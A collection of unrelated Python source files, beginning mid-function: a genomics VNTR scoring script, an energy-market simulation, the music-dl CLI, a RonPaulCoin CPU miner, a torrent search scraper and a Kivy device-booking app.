p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, false_scores))
process_list.append(p)
p.start()
else:
if vntr_finder.is_true_read(read):
sema.acquire()
p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, true_scores))
else:
if random() > 0.001:
continue
sema.acquire()
p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, false_scores))
process_list.append(p)
p.start()
for p in process_list:
p.join()
with open(true_reads_hmm_scores, 'w') as out:
for score in true_scores:
out.write('%s\n' % score)
with open(false_reads_hmm_scores, 'w') as out:
for score in false_scores:
out.write('%s\n' % score)
def find_info_by_mapping(sim_dir='simulation_data/', dir_index=0):
reference_vntrs = load_unique_vntrs_data()
id_to_gene = {119: 'DRD4', 1220: 'GP1BA', 1221: 'CSTB', 1214: 'MAOA', 1219: 'IL1RN'}
gene_to_length = {'DRD4': 528, 'GP1BA': 39, 'CSTB': 168, 'MAOA': 30}
clean_up_tmp()
dirs = glob.glob(sim_dir+'/*')
simulation_dir = dirs[dir_index]
files = glob.glob(simulation_dir + '/*')
for fasta_file in files:
if fasta_file.endswith('WGS_30x.fasta'):
gene_name = simulation_dir.split('/')[-1].split('_')[0]
vntr_id = None
for vid, gname in id_to_gene.items():
if gname == gene_name:
vntr_id = vid
ref_vntr = reference_vntrs[vntr_id]
true_reads_file = fasta_file[:-6] + '_true_reads.txt'
simulated_sam_file = fasta_file[:-6] + '.sam'
if not os.path.exists(true_reads_file):
region = [ref_vntr.start_point, ref_vntr.start_point + gene_to_length[gene_name]]
true_reads = get_id_of_reads_mapped_to_vntr_in_samfile(simulated_sam_file, ref_vntr, region=region)
with open(true_reads_file, 'w') as out:
for true_read in true_reads:
out.write('%s\n' % true_read)
else:
with open(true_reads_file) as input:
lines = input.readlines()
true_reads = [line.strip() for line in lines if line.strip() != '']
true_reads_hmm_scores = fasta_file[:-6] + '_t_reads_hmm_score.txt'
false_reads_hmm_scores = fasta_file[:-6] + '_f_reads_hmm_score.txt'
if not os.path.exists(true_reads_hmm_scores):
write_hmm_scores(simulated_sam_file, true_reads_hmm_scores, false_reads_hmm_scores, ref_vntr, true_reads)
for i, parameter in enumerate([10]):
positive_file = fasta_file[:-6] + '_bwa_%s_positive_supplementary_reads.txt' % abs(parameter)
false_negative_file = fasta_file[:-6] + '_bwa_%s_fn_supplementary_reads.txt' % abs(parameter)
if os.path.exists(positive_file) and os.path.exists(false_negative_file):
continue
bwa_alignment_file = '/tmp/_gene%s_' % dir_index + 'bwa_alignment_%s.sam' % i
bwa_alignment(fasta_file, bwa_alignment_file, parameter)
positive_reads, fn_reads = get_positive_and_fn_reads_from_samfile(bwa_alignment_file, ref_vntr, true_reads)
save_reads_stat(positive_file, positive_reads)
save_reads_stat(false_negative_file, fn_reads)
clean_up_tmp()
for i, parameter in enumerate([-0.6, -2]):
if i == 0:
continue
positive_file = fasta_file[:-6] + '_bowtie_%s_positive_supplementary_reads.txt' % abs(parameter)
false_negative_file = fasta_file[:-6] + '_bowtie_%s_fn_supplementary_reads.txt' % abs(parameter)
if os.path.exists(positive_file) and os.path.exists(false_negative_file):
continue
bowtie_alignment_file = '/tmp/_gene%s_' % dir_index + 'bowtie_alignment_%s.sam' % i
bowtie_alignment(fasta_file, bowtie_alignment_file, parameter)
positive_reads, fn_reads = get_positive_and_fn_reads_from_samfile(bowtie_alignment_file, ref_vntr, true_reads)
save_reads_stat(positive_file, positive_reads)
save_reads_stat(false_negative_file, fn_reads)
if gene_name == 'MAOA':
os.system('cp %s /pedigree2/projects/VeNTeR/bowtie_alignment_%s.sam' % (bowtie_alignment_file, i))
clean_up_tmp()
find_info_by_mapping('simulation_data/', int(sys.argv[1]))
|
market.py
|
import time
# import sys
import random
import signal
import concurrent.futures
import os
from multiprocessing import Process
import sysv_ipc
from .sharedvariables import SharedVariables
import math
class Market(Process):
def __init__(
self,
shared_variables: SharedVariables,
coeffs,
internal_factors,
external_factors,
market_city_ipc_key: str,
city_market_ipc_key: str,
event_probability: int,
):
super().__init__()
self.shared_variables = shared_variables
self.city2market = sysv_ipc.MessageQueue(
city_market_ipc_key, sysv_ipc.IPC_CREAT
)
self.market2city = sysv_ipc.MessageQueue(
market_city_ipc_key, sysv_ipc.IPC_CREAT
)
self.market_price = 1.5
self.day = 0
self.threads = []
self.event_probability = event_probability
self.ENERGY = {
"bought": 0,
"sold": 0,
"bought_total": 0,
"sold_total": 0,
}
""" Modulation coefficients for market price calculation """
self.COEFFS = coeffs
""" Internal factors that influences market price"""
self.INTERNAL_FACTORS = internal_factors
""" External factors that influences market price"""
self.EXTERNAL_FACTORS = external_factors
def variation(self, coeffs: list, factors: dict):
return sum([a * b for a, b in zip(list(factors.values()), coeffs)])
def calc_stock(self, sold, bought):
"""Calculates new energy stock influence"""
stock = self.INTERNAL_FACTORS["energy_stock"] + (sold - bought)
if stock == 0:
self.INTERNAL_FACTORS["energy_stock"] = 0
elif stock < 0:
self.INTERNAL_FACTORS["energy_stock"] = -1 * math.log(abs(stock))
else:
self.INTERNAL_FACTORS["energy_stock"] = math.log(stock)
def update_price(self, oldprice: float):
attenuation_variation = (
self.COEFFS["att"] * oldprice
) # Calculates price attenuation
internal_variation = self.variation(
self.COEFFS["intern"], self.INTERNAL_FACTORS
)
external_variation = self.variation(
self.COEFFS["extern"], self.EXTERNAL_FACTORS
)
price = round(
attenuation_variation + internal_variation + external_variation, 2
)
return price
def send_message(self, mtype, pid, data):
""" Send a message to Home """
response = bytes("%s;%s;%s" % (mtype, pid, data), "utf-8")
return self.market2city.send(response)
def new_day(self):
self.day += 1
self.calc_stock(self.ENERGY["sold"], self.ENERGY["bought"])
self.market_price = self.update_price(self.market_price)
self.ENERGY["bought"] = 0
self.ENERGY["sold"] = 0
print("Market Price is at : %s$/KWh" % self.market_price)
print(
"Market stock difference : %s" % self.INTERNAL_FACTORS["energy_stock"]
)
self.shared_variables.sync_barrier.wait()
def get_message(self):
message, t = self.city2market.receive()
return self.formatMessage(message.decode("utf-8"))
def formatMessage(self, message: str):
if isinstance(message, str):
data = message.split(";")
if len(data) == 3:
if all(
[x.isdigit() for x in data]
): # Si chaque valeur de data est un nombre
msg = {"type": data[0], "pid": data[1], "value": data[2]}
return msg
print("Incorrect format. Ignored message : %s" % message)
return False
def run(self):
try:
signal.signal(signal.SIGUSR1, self.diplomatic_event)
signal.signal(signal.SIGUSR2, self.natural_event)
self.eventProcess = Process(target=self.events_trigger, args=())
self.eventProcess.start()
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
self.shared_variables.sync_barrier.wait()
while True:
msg = self.get_message()
if msg:
if msg["type"] == "1":
executor.submit(
self.send_message,
"1",
msg["pid"],
round(self.market_price * int(msg["value"]), 2),
)
self.ENERGY["sold"] += int(msg["value"])
elif msg["type"] == "2":
executor.submit(
self.send_message,
"2",
msg["pid"],
round(self.market_price * int(msg["value"]), 2),
)
self.ENERGY["bought"] += int(msg["value"])
elif msg["type"] == "5":
self.new_day()
except KeyboardInterrupt:
self.market2city.remove()
self.city2market.remove()
def events_trigger(self):
n = 50
while True:
time.sleep(self.event_probability)
x = random.randint(0, n)
if x == 0:
print("KILLING OS")
os.kill(os.getpid(), signal.SIGUSR1)
n = 50
if x == 1:
os.kill(os.getpid(), signal.SIGUSR2)
n = 50
else:
n += -1
def diplomatic_event(self, sig, _):
self.EXTERNAL_FACTORS['diplomatic'] = 1
print(
"£££££££££££££££££££££££££££££££££\n"
"DIPLOMATIC EVENT TRIGGERED !\n"
"£££££££££££££££££££££££££££££££££\n"
)
def natural_event(self, sig, _):
self.EXTERNAL_FACTORS['natural'] = 1
print(
"£££££££££££££££££££££££££££££££££\n"
"NATURAL EVENT TRIGGERED !\n"
"£££££££££££££££££££££££££££££££££\n"
)
|
__main__.py
|
#!/usr/bin/env python
# -*- coding:utf-8 _*-
"""
@author: HJK
@file: main.py
@time: 2019-01-08
"""
import sys
import re
import threading
import click
import logging
import prettytable as pt
from . import config
from .utils import colorize
from .core import music_search, music_download, music_list_merge, get_sequence
import gettext
gettext.install('music-dl', 'locale')
def run():
logger = logging.getLogger(__name__)
music_list = []
thread_pool = []
errors = []
click.echo(
"\n"
+ _("正在搜索 {searchterm} 来自 ...").format(
searchterm=colorize(config.get("keyword"), "yellow")
),
nl=False,
)
# 多线程搜索
for source in config.get("source").split():
t = threading.Thread(target=music_search, args=(source, music_list, errors))
thread_pool.append(t)
t.start()
for t in thread_pool:
t.join()
# 分割线
click.echo("\n---------------------------\n")
# 输出错误信息
for err in errors:
logger.debug(_("音乐列表 {error} 获取失败.").format(error=err[0].upper()))
logger.debug(err[1])
# 对搜索结果排序和去重
if config.get("merge"):
music_list = music_list_merge(music_list)
# 创建table
tb = pt.PrettyTable()
tb.field_names = ["序号", "歌手", "歌名", "大小", "时长", "专辑", "来源"]
# 遍历输出搜索列表
for index, music in enumerate(music_list):
music.idx = index
tb.add_row(music.row)
# click.echo(music.info)
tb.align = "l"
click.echo(tb)
# 分割线
click.echo("\n---------------------------")
# 用户指定下载序号
prompt = (
_("请输入{下载序号},支持形如 {numbers} 的格式,输入 {N} 跳过下载").format(
下载序号=colorize(_("下载序号"), "yellow"),
numbers=colorize("0 3-5 8", "yellow"),
N=colorize("N", "yellow"),
)
+ "\n >>"
)
choices = click.prompt(prompt)
while choices.lower() != "n" and not re.match(
r"^((\d+\-\d+)|(\d+)|\s+)+$", choices
):
choices = click.prompt("%s%s" % (colorize(_("输入有误!"), "red"), prompt))
selected_list = get_sequence(choices)
for idx in selected_list:
music_download(idx, music_list)
# 下载完后继续搜索
keyword = click.prompt(_("请输入要搜索的歌曲,或Ctrl+C退出") + "\n >>")
config.set("keyword", keyword)
run()
@click.command()
@click.version_option()
@click.option(
"-k",
"--keyword",
prompt=_("请输入要搜索的歌曲,名称和歌手一起输入可以提高匹配(如 空帆船 朴树)") + "\n >>",
help=_("搜索关键字"),
)
@click.option(
"-s",
"--source",
default="qq netease kugou baidu xiami flac",
help=_("支持的数据源: ") + "qq netease kugou baidu xiami flac",
)
@click.option("-c", "--count", default=5, help=_("搜索数量限制"))
@click.option("-o", "--outdir", default=".", help=_("指定输出目录"))
@click.option("-x", "--proxy", default="", help=_("指定代理(如http://127.0.0.1:1087)"))
@click.option("-m", "--merge", default=True, is_flag=True, help=_("对搜索结果去重和排序(默认去重)"))
@click.option("-v", "--verbose", default=False, is_flag=True, help=_("详细模式"))
def main(keyword, source, count, outdir, proxy, merge, verbose):
"""
Search and download music from netease, qq, kugou, baidu and xiami.
Example: music-dl -k "周杰伦"
"""
# 初始化全局变量
config.init()
config.set("keyword", keyword)
config.set("source", source)
config.set("count", min(count, 50))
config.set("outdir", outdir)
config.set("merge", merge)
config.set("verbose", verbose)
if proxy:
proxies = {"http": proxy, "https": proxy}
config.set("proxies", proxies)
level = logging.INFO if verbose else logging.WARNING
logging.basicConfig(
level=level,
format="[%(asctime)s] %(levelname)-8s | %(name)s: %(msg)s ",
datefmt="%Y-%m-%d %H:%M:%S",
)
try:
run()
except (EOFError, KeyboardInterrupt):
sys.exit(0)
if __name__ == "__main__":
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The RonPaulCoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class RonPaulCoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = RonPaulCoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
simple.py
|
import threading
import requests
from bs4 import BeautifulSoup
class Simple:
def __init__(self, player=None):
self.player = player
def search_thread(self, q):
print("search thread begin")
try:
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
}
r = requests.get("https://nyaa.unblockit.uno", params={"f": "0", "c":"1_0", "q": q}, headers=headers)
print(r.url)
if r.status_code != 200:
return
result = []
soup = BeautifulSoup(r.text, 'html.parser')
rows = soup.select("body > div > div.table-responsive > table > tbody > tr")
for row in rows:
sname = row.select("td:nth-child(2) > a:nth-child(2)")
smagnate = row.select("td:nth-child(3) > a:nth-child(2)")
if sname and smagnate:
name = sname[0].string
magnate = smagnate[0].get('href')
result.append({"name": name, "url": magnate})
print("search done")
print(result)
self.player.call('hot', result)
except:
import traceback
traceback.print_exc()
print("search thread end")
def on_search(self, *args, **kwargs):
print(f'{args=} {kwargs=}')
t = threading.Thread(target=self.search_thread, args=args)
t.start()
if __name__ == "__main__":
s = Simple()
s.search_thread('one punch')
|
main.py
|
# -*- coding: utf8 -*-
#
# (c) 2015 microelly2 MIT
#
vers="V123"
import kivy
kivy.require('1.0.9')
from kivy.app import App
from kivy.properties import *
from kivy.base import EventLoop
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.scrollview import ScrollView
#from kivy.lang import Builder
from kivy.clock import Clock
from kivy.properties import BooleanProperty
from kivy.utils import platform
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.factory import Factory
from kivy.clock import Clock
from kivy.support import *
install_android()
import datetime,re,os,random, time, threading
import httplib, socket, urllib2, zipfile
from kivy.support import *
install_android()
#from kivy.config import Config
#Config.set('graphics', 'width', '600')
#Config.set('graphics', 'height', '800')
# Config.set('graphics', 'width', '160')
# Config.set('graphics', 'height', '620')
superbl=None
import datetime,re,os,random
import httplib
import socket
def update(btn):
print "update software .... not implemented"
class KButton(Button):
key=Property('')
class addon(FloatLayout):
pass
# die graphische oberflaeche
class kite(FloatLayout):
pass
if platform == "android":
import android
from jnius import autoclass, cast
from android.runnable import run_on_ui_thread
# Toast = autoclass("android.widget.Toast")
class PopupBox(Popup):
pop_up_text = ObjectProperty()
def update_pop_up_text(self, p_message):
self.pop_up_text.text = p_message
def unzip(zipFilePath, destDir):
zfile = zipfile.ZipFile(zipFilePath)
if not os.path.exists(destDir):
os.mkdir(destDir)
for name in zfile.namelist():
print name
(dirName, fileName) = os.path.split(name)
newDir = destDir + '/' + dirName
if not os.path.exists(newDir):
os.mkdir(newDir)
if not fileName == '':
fd = open(destDir + '/' + name, 'wb')
fd.write(zfile.read(name))
fd.close()
def wotagstring(wotagint):
week = [ 'Mo', 'Di', 'Mi', 'Do', 'Fr', 'Sa','So']
return week[wotagint]
# die anwendung ...
class kiteApp(App):
global update
exitnext = BooleanProperty(False)
tag=Property('')
stunde=Property('')
klasse=Property('')
name=Property('Schlaumeier-Neugscheid')
geraet=Property(None)
but=Property(None)
ao=Property(None)
bl=Property(None)
ip=Property('192.168.178.22')
ip=Property('freecadbuch.de')
def build(self):
self.bind(on_start=self.post_build_init)
c= kite(title='Hello world')
return c
# def sayhello(self,button,name):
# print "Hello " + name + ", this is the simple App!"
# button.text = "[size=100][b]Super " + name + "[/b]\nSay hello [color=#ff0000]again![/size][/color]"
def setzeFarbe(self,but):
for b in but.parent.children:
b.background_color=(1,0,1,1)
but.background_color=(1,1,0,1)
def setzeTag(self,but):
print "setze Tage"
print but.text
self.tag=but.key
self.setzeFarbe(but)
#print self.root.buchen
print but.parent
print but.parent.parent
print but.parent.parent.parent
print but.parent.parent.parent.parent
print but.parent.parent.parent.parent.parent
but.parent.parent.parent.parent.parent.title=but.text
but.parent.parent.parent.parent.parent.collapse=True
self.upd()
self.aktualisiereGeraete(None)
self.root.tag.collapse=True
self.root.stunde.collapse=False
def setzeStunde(self,but):
print but.text
self.stunde=but.text
self.setzeFarbe(but)
but.parent.parent.parent.parent.parent.title=but.text
but.parent.parent.parent.parent.parent.collapse=True
self.upd()
self.aktualisiereGeraete(None)
self.root.stunde.collapse=True
self.root.geraet.collapse=False
def setzeGeraet(self,but):
print "SETZT GERAET"
print but.text
self.geraet=but.text
self.geraet=but.key
# self.setzeFarbe(but)
# but.parent.parent.parent.parent.parent.title=but.text
but.parent.parent.parent.parent.parent.collapse=True
self.upd()
self.buchen()
# self.clear()
def setzeKlasse(self,but):
print but.text
self.klasse=but.text
self.setzeFarbe(but)
but.parent.parent.parent.parent.parent.title=but.text
but.parent.parent.parent.parent.parent.collapse=True
self.upd()
def upd(self):
pass
def buchen(self):
if self.tag=='':
print "kein Tag"
self.root.tag.collapse=False
self.root.geraet.collapse=True
elif self.stunde=='':
print "keine Stunde"
self.root.tag.collapse=True
self.root.stunde.collapse=False
self.root.geraet.collapse=True
else:
print "Tag ist da"
print self.tag
mess=str(self.tag+self.heute) + ":"+ str(self.stunde) + ";"+ str(self.geraet)+':'+self.name
print mess
rc=self.sendeBuchung(mess)
print rc
#Buchung anzeigen
self.meineBuchungen()
#but=Button()
#but.text=self.doyString(self.tag) + " -"+ str(self.stunde) + "- "+ str(self.geraet)
#self.but=but
#but.on_release=self.loesche
#self.root.liste.add_widget(but)
self.root.buchen.collapse=True
self.root.liste.collapse=False
print self.root.liste.collapse
# self.tag=''
t=int(self.tag)
s=int(self.stunde)
if s>=9:
s=0
t +=1
self.tag=int(t)
self.stunde=str(s+1)
self.geraet=''
self.klasse=''
self.upd()
self.clear()
def clear(self):
# self.root.geraet.title="Geraet ??"
# self.root.tag.title="Tag"
self.root.tag.title=self.doyString(self.tag)
self.root.stunde.title=str(self.stunde)
# self.root.buchen.title="Clear"
return
if not self.ao:
self.ao=addon()
self.bl=self.root.kite
self.root.remove_widget(self.root.kite)
self.root.add_widget(self.ao)
else:
self.root.remove_widget(self.ao)
self.root.add_widget(self.bl)
self.ao=False
def loesche(self):
but=self.but
print "loesche", but
print but.parent
but.parent.remove_widget(but)
def wechseln(self):
layout = GridLayout(cols=2)
for i in range(21):
layout.add_widget(Button(text='Hello 1'))
# layout.add_widget(Button(text='World 1'))
button = Button(text='zurick!', font_size=14)
button.bind(on_release=self.goback)
layout.add_widget(button)
self.rest=self.root.children[0]
self.root.remove_widget(self.rest)
self.root.add_widget(layout)
print self.root.children
def wechseln2(self):
layout = GridLayout(cols=7)
for stunde in range(9):
for geraet in range(7):
b=Button(text=str(geraet+1)+'\n'+str(stunde+1))
r=random.random()
if r < 0.6:
b.background_color=(1,0,1,1)
else:
b.background_color=(0,1,1,1)
layout.add_widget(b)
# layout.add_widget(Button(text='World 1'))
for g in ['z','u','r','i','c','k','!']:
button = Button(text=g)
button.bind(on_release=self.goback)
layout.add_widget(button)
self.rest=self.root.children[0]
self.root.remove_widget(self.rest)
self.root.add_widget(layout)
print self.root.children
def goback(self,but):
print self.root.children
self.root.remove_widget(self.root.children[0])
self.root.add_widget(self.rest)
print "giback"
def on_pause(self):
# Here you can save data if needed
return True
def on_resume(self):
# Here you can check if any data needs replacing (usually nothing)
pass
def on_stop(self):
print "on_stop"
#self.schreibeTagDatei()
def sayhello(self,button,name=None):
print "Hello " + str(name) + ", this is the simple App!"
# button.text = "[size=100][b]Super " + name + "[/b]\nSay hello [color=#ff0000]again![/size][/color]"
# button.text='Buchen'
if name:
self.name=name
print self.ao
global superbl
print superbl
self.root.clear_widgets()
if not self.ao:
self.ao=addon()
self.bl=self.root.bl
# self.root.remove_widget(self.root.bl)
self.root.add_widget(self.ao)
else:
# self.root.remove_widget(self.ao)
self.root.add_widget(self.bl)
self.root.buchen.collapse=True
self.root.liste.collapse=False
self.root.tag.collapse=True
self.root.stunde.collapse=True
self.root.geraet.collapse=True
self.meineBuchungen()
# self.ao=False
# self.liste fuellen
def sayhello2(self,a):
self.sayhello(self,a)
def sendeBuchung(self,mess):
c = httplib.HTTPConnection(self.ip)
authstring="&u="+self.user+"&n="+self.name+"&p="+self.passw
sendstring= "/appdat_server/appstore.php?m="+ mess+"&u=user&h=1234&k=9876"+authstring
print "Sendstrung"
print sendstring
c.request("GET", sendstring)
response = c.getresponse()
print "rsponce:",response.status, response.reason
if response.status == 200:
data = response.read()
print data
vals=data.split('\n')
vals.pop(-1)
print vals
return vals
else:
print "Fehler Datensendung"
def lesedatei(self,dateiname):
print "Lese Daten aus dem Netz ..."
try:
c = httplib.HTTPSConnection(self.ip)
c.connect()
except :
print "Error HTTPS"
try:
c = httplib.HTTPConnection(self.ip)
c.connect()
except :
print "Error HTTP"
return []
authstring="&u="+self.user+"&n="+self.name+"&p="+self.passw
req="/appdat_server/appconfig.php?c="+ dateiname +".txt" + "&u=user&h=1234&k=9876"+authstring
print req
c.request("GET", req)
response = c.getresponse()
print "rsponce:",response.status, response.reason
if response.status == 200:
print "ok"
else:
print "problem : the query returned %s because %s" % (response.status, response.reason)
# print("-----##-")
data = response.read()
# print data
# print("-----++-")
vals=data.split('\n')
print "auth string .."
print vals[0]
vals.pop(-1)
vals.pop(0)
# for v in vals:
# print "!"+v+"!"
return vals
def holeBuchungen(self):
day_of_year = datetime.datetime.now().timetuple().tm_yday
self.heute=day_of_year
day='274'
ss=(datetime.datetime.now() + datetime.timedelta(days=int(day)-day_of_year)).strftime(", %d.%m")
print ss
buchs=self.lesedatei("buchungen")
# print buchs
buli={}
for b in buchs:
try:
[k,d]=b.split(';')
[t,s]=k.split(':')
[g,u]=d.split(':')
day=t
ss=(datetime.datetime.now() + datetime.timedelta(days=int(day)-day_of_year)).strftime(", %d.%m")
print [t,ss,s,g,u]
try:
buli[t]
except:
buli[t]={}
try:
buli[t][s]
except:
buli[t][s]={}
try:
buli[t][s][g]
except:
buli[t][s][g]=[]
if u=='frei':
del(buli[t][s][g])
else:
buli[t][s][g].append(u)
except:
print "fehler bei verarbeiten von " + b + "!"
for t in sorted(buli):
# print "##",t
for s in sorted(buli[t]):
# print "--",s
for g in sorted(buli[t][s]):
print [t,s,g,buli[t][s][g]]
pass
self.buli=buli
return buli
def holePersonen(self):
return self.lesedatei('personen')
def holeGeraete(self):
print "hole geraete"
lg=self.lesedatei('geraete')
self.root.geraete.clear_widgets()
for g in lg:
#gt=datetime.datetime.now().strftime("%H:%M:%S\n") + g
gt=g
w=Button(text=gt,on_release = self.setzeGeraet)
print w.on_release
self.root.geraete.add_widget(w)
def holeStunden(self):
self.root.stunden.clear_widgets()
for g in range(9):
w=KButton(text=str(g+1), on_release = self.setzeStunde,key=g)
print w.key
self.root.stunden.add_widget(w)
def holeTage(self):
self.root.tage.clear_widgets()
for g in range(14):
gs="tag " +str(g)
wd=(datetime.datetime.now() + datetime.timedelta(hours=24*g)).weekday()
if wd<>5 and wd<>6:
ss= (datetime.datetime.now() + datetime.timedelta(hours=24*g)).strftime(", %d.%m")
week = [ 'Mo', 'Di', 'Mi', 'Do', 'Fr', 'Sa','So']
gs=week[wd] + ss
w=KButton(text=gs, on_release = self.setzeTag,key=g)
self.root.tage.add_widget(w)
def aktualisiereGeraete(self,but):
print "aktualisiere GERAAATER"
lg=self.lesedatei('geraete')
self.root.geraete.clear_widgets()
print "aktualisiere geraet"
print self.buli
print "--------------------------------------"
print self.tag
print self.heute
print self.stunde
print "------------------------------"
try:
print self.buli[str(self.heute+self.tag)][str(self.stunde)]
zz=self.buli[str(self.heute+self.tag)][str(self.stunde)]
except:
zz={}
print "tag/stunde frei"
print "-------------"
for sg in lg:
print sg
sgl= sg.split(';')
g=sgl[0]
if len(sgl)>1:
try:
wotag=self.tag
if wotag>7: wotag -= 7
gaddl=sgl[wotag].split(':')
print (gaddl)
print self.stunde
print self.heute
gadd= " (" + gaddl[int(self.stunde)] + ")"
except:
gadd=""
else:
gadd=""
gt= g + gadd
if zz.has_key(g):
w=Button(text=gt + "\n"+str(zz[g]))
w.background_color=(1,0,0,1)
else:
w=KButton(text=gt,on_release = self.setzeGeraet)
w.key=g
w.background_color=(0,1,0,1)
#print w
#print w.on_release
# w=Button(text=gt+"TT",on_enter = self.setzeTag)
self.root.geraete.add_widget(w)
def meineBuchungen(self):
buli=self.holeBuchungen()
self.root.liste.clear_widgets()
farbe=True
for t in sorted(buli):
print "##",t
if int(t) <self.heute:
continue
for s in sorted(buli[t]):
print "--",s
for g in sorted(buli[t][s]):
print [t,s,g,buli[t][s][g]]
nick=buli[t][s][g][0][0:2]
if nick <> self.user:
continue
tt=self.doyString2(t)
ytext= " ".join([tt,s,g,buli[t][s][g][0][0:2]])
btn = Button(text=ytext)
from functools import partial
s3= t+':'+s+';'+g+':frei'
print s3
def myprint(s,btn):
print s
btn.parent.remove_widget(btn)
rc=self.sendeBuchung(s)
print rc
print "Auswertung ---------------------------------------"
self.meineBuchungen()
print "aktualisiert ---------------------------------------------"
